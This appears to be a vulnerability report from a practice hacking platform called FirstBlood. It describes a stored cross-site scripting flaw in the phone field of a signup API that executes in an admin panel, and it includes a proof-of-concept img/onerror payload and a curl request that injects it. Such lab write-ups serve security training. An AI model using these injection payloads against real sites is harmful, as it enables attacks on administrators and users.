FirstBlood-#1020Stored XSS on drpanel
This issue was discovered on FirstBlood v3

On 2022-12-08, lumbridge7 Level 4 reported:

Hello firstblood team!


The API endpoint that handles the request on to join an event doesn't properly sanitizes the input on the phone parameter. While it is not possible to insert anything other than numbers through the GUI, an attacker can still manually craft the POST request using malicious JS code ad the phone value.

Steps to reproduce

  1. Make a POST request at with the payload full_name=StoredXSS&phone=<img src=x onerror=confirm(document.domain)>&submit=Signup
  2. log in the drpanel

Curl request:

curl -X POST '' -H "Content-Type: application/x-www-form-urlencoded" -d "full_name=StoredXSS&phone=<img%20src=x%20onerror=confirm(document.domain)>&submit=Signup"



Endpoint: /api/hackerback.php

Parameter: phone

Payload: <img src=x onerror=confirm(document.domain)>

FirstBlood ID: 59
Vulnerability Type: Stored XSS

It is possible to execute XSS against the admin via the PHONE parameter on /api/hackerback.php. The developer thought setting the input type to "tel" would prevent users from entering malicious payloads.

Report Feedback


Creator & Administrator

Congratulations, you were the third researcher to discover this!